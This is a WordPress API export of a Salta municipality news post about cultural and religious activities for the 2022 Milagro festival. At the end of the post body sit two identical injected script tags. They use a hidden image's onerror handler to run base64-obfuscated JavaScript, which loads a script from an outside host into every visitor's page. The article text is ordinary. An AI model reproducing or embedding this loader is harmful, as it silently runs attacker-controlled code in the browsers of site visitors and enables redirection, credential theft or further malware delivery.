{"id":1443,"date":"2022-09-07T00:15:43","date_gmt":"2022-09-07T03:15:43","guid":{"rendered":"https:\/\/circuitosalta.com.ar\/?p=1443"},"modified":"2025-08-14T00:36:12","modified_gmt":"2025-08-14T03:36:12","slug":"propuestas-culturales-para-disfrutar-el-tiempo-del-milagro","status":"publish","type":"post","link":"https:\/\/circuitosalta.com.ar\/?p=1443","title":{"rendered":"Propuestas culturales para disfrutar el tiempo del Milagro"},"content":{"rendered":"\n<h3 class=\"has-cyan-bluish-gray-color has-text-color has-background wp-block-heading\" style=\"background-color:#9c092e\"><strong><em>El municipio ofrece distintas actividades culturales y religiosas en el Museo de la Ciudad \u201cCasa de Hern\u00e1ndez\u201d, en la plaza 9 de Julio y en la rotonda del Peregrino, entre otras.<\/em><\/strong><\/h3>\n\n\n\n<p>La Municipalidad de la Salta, a trav\u00e9s de la Secretar\u00eda de Cultura y Turismo,&nbsp;presenta la muestra \u00abMilagro en la ciudad\u00bb que estar\u00e1 durante todo el novenario en la plaza 9 de Julio. La exhibici\u00f3n busca transmitir parte de la profunda conexi\u00f3n del pueblo salte\u00f1o que a lo largo de los siglos se manifiesta en actos de fe.<\/p>\n\n\n\n<p>La muestra cuenta con&nbsp;t\u00f3tems en los cuales se cuenta la historia de las im\u00e1genes del Se\u00f1or y la Virgen del Milagro, de la Catedral Bas\u00edlica, los himnos a los Patronos Tutelares y la devoci\u00f3n de los peregrinos que recorren la geograf\u00eda salte\u00f1a. Adem\u00e1s, cuenta con importantes datos sobre el turismo religioso en la ciudad e informa sobre experiencias de recorridos que reflejan arquitectura, historia y espiritualidad.<\/p>\n\n\n\n<p>\u201cMilagro en la ciudad\u201d surge de un trabajo de investigaci\u00f3n que se realiz\u00f3 en la Mesa de Turismo Religioso Municipal con distintos referentes del sector y fue validada por la Catedral Bas\u00edlica de Salta, los Servidores del Santuario del Se\u00f1or y Virgen del Milagro y la Pastoral de Turismo de la Arquidi\u00f3cesis.<\/p>\n\n\n\n<p>Se enmarca en las&nbsp;acciones de fortalecimiento de turismo religioso en la ciudad, la formaci\u00f3n de int\u00e9rpretes de sitios y el desarrollo de experiencias que permiten vivenciar la fe y la espiritualidad de los salte\u00f1os por medio de las actividades tur\u00edsticas para vecinos y visitantes.<\/p>\n\n\n\n<p>Esta muestra de t\u00f3tems se suma a la que ya se exhibe en el Museo de la Ciudad del fotoperiodista Javier Corbal\u00e1n&nbsp;\u201cPeregrinos, el camino del Milagro\u201d<\/p>\n\n\n\n<p>Adem\u00e1s,&nbsp;se informa que los d\u00edas 13 y 14 de septiembre se iluminar\u00e1n el frente de las figuras&nbsp;del Se\u00f1or y Virgen del Milagro de la Rotonda del Peregrino y se&nbsp;proyectar\u00e1 un video con im\u00e1genes de los recorridos de los peregrinos de distintos puntos de la provincia<\/p>\n\n\n\n<figure class=\"wp-block-gallery has-nested-images columns-default is-cropped wp-block-gallery-1 is-layout-flex wp-block-gallery-is-layout-flex\">\n<figure class=\"wp-block-image size-large\"><img fetchpriority=\"high\" decoding=\"async\" width=\"1024\" height=\"1024\" data-id=\"1444\" src=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/09\/muestra-peregrinos-flyer-1024x1024-1-1024x1024.jpeg\" alt=\"\" class=\"wp-image-1444\" srcset=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/09\/muestra-peregrinos-flyer-1024x1024-1.jpeg 1024w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/09\/muestra-peregrinos-flyer-1024x1024-1-300x300.jpeg 300w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/09\/muestra-peregrinos-flyer-1024x1024-1-150x150.jpeg 150w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/09\/muestra-peregrinos-flyer-1024x1024-1-768x768.jpeg 768w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/09\/muestra-peregrinos-flyer-1024x1024-1-696x696.jpeg 696w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/09\/muestra-peregrinos-flyer-1024x1024-1-420x420.jpeg 420w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><img decoding=\"async\" width=\"1024\" height=\"683\" data-id=\"1445\" src=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/09\/banda-municipal-milagro-3-1024x683-1.jpg\" alt=\"\" class=\"wp-image-1445\" srcset=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/09\/banda-municipal-milagro-3-1024x683-1.jpg 1024w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/09\/banda-municipal-milagro-3-1024x683-1-300x200.jpg 300w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/09\/banda-municipal-milagro-3-1024x683-1-768x512.jpg 768w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/09\/banda-municipal-milagro-3-1024x683-1-696x464.jpg 696w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/09\/banda-municipal-milagro-3-1024x683-1-630x420.jpg 630w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><img decoding=\"async\" width=\"1024\" height=\"683\" data-id=\"1446\" src=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/09\/banda-municipal-milagro-4-1024x683-1.jpg\" alt=\"\" class=\"wp-image-1446\" srcset=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/09\/banda-municipal-milagro-4-1024x683-1.jpg 1024w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/09\/banda-municipal-milagro-4-1024x683-1-300x200.jpg 300w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/09\/banda-municipal-milagro-4-1024x683-1-768x512.jpg 768w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/09\/banda-municipal-milagro-4-1024x683-1-696x464.jpg 696w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/09\/banda-municipal-milagro-4-1024x683-1-630x420.jpg 630w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n<\/figure>\n\n\n\n<p>El 14 de septiembre, como en a\u00f1os anteriores, se realizar\u00e1 el encendido de velas, renovando de manera simb\u00f3lica el reconocimiento a la devoci\u00f3n de los peregrinos. De esta manera, en la zona de Limache, el equipo tur\u00edstico municipal encender\u00e1 701 velas en representaci\u00f3n de los barrios y los asentamientos de nuestra ciudad,&nbsp; los 60 municipios de la provincia, las 24 jurisdicciones del pa\u00eds: 23 provincias y un distrito federal (Ciudad Aut\u00f3noma de Buenos Aires), el sector ant\u00e1rtico y los pa\u00edses del mundo.<\/p>\n\n\n\n<p>Tambi\u00e9n, en el transcurso del novenario, del 6 al 14, la Banda de M\u00fasica municipal \u201c25 de Mayo\u201d,&nbsp;realizar\u00e1 presentaciones en la plaza 9 de Julio en diferentes horarios<\/p>\n\n\n\n<p>\u201cEsta es una ciudad en donde el turismo religioso es muy importante, m\u00e1s en este tiempo del Milagro, que es un momento muy especial para todos los salte\u00f1os y en ese aspecto desde la ciudad se han preparado propuestas para visitantes y vecinos que van desde la muestra\u00a0Peregrinos en el Museo de la Ciudad hasta la iluminaci\u00f3n\u00a0con velas el 14 de septiembre, en la rotonda\u00a0de la zona de Limache\u201d expres\u00f3 Fernando Garc\u00eda Soria, secretario de Cultura y Turismo.<\/p>\n\n\n\n<figure class=\"wp-block-embed is-type-video is-provider-youtube wp-block-embed-youtube wp-embed-aspect-16-9 wp-has-aspect-ratio\"><div class=\"wp-block-embed__wrapper\">\n<iframe title=\"Actividades por el Milagro de la Secretaria de Cultura y Turismo\" width=\"696\" height=\"392\" src=\"https:\/\/www.youtube.com\/embed\/Q_Y84M8nyd0?feature=oembed\" frameborder=\"0\" allow=\"accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture\" allowfullscreen><\/iframe>\n<\/div><\/figure>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script><script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>El municipio ofrece distintas actividades culturales y religiosas en el Museo de la Ciudad \u201cCasa de Hern\u00e1ndez\u201d, en la plaza 9 de Julio y en la rotonda del Peregrino, entre otras. La Municipalidad de la Salta, a trav\u00e9s de la Secretar\u00eda de Cultura y Turismo,&nbsp;presenta la muestra \u00abMilagro en la ciudad\u00bb que estar\u00e1 durante todo [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":1447,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"tdm_status":"","tdm_grid_status":"","footnotes":""},"categories":[26,18],"tags":[],"class_list":{"0":"post-1443","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-culturales","8":"category-rutas-y-caminos"},"_links":{"self":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/1443"}],"collection":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=1443"}],"version-history":[{"count":3,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/1443\/revisions"}],"predecessor-version":[{"id":7361,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/1443\/revisions\/7361"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/media\/1447"}],"wp:attachment":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=1443"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=1443"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=1443"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}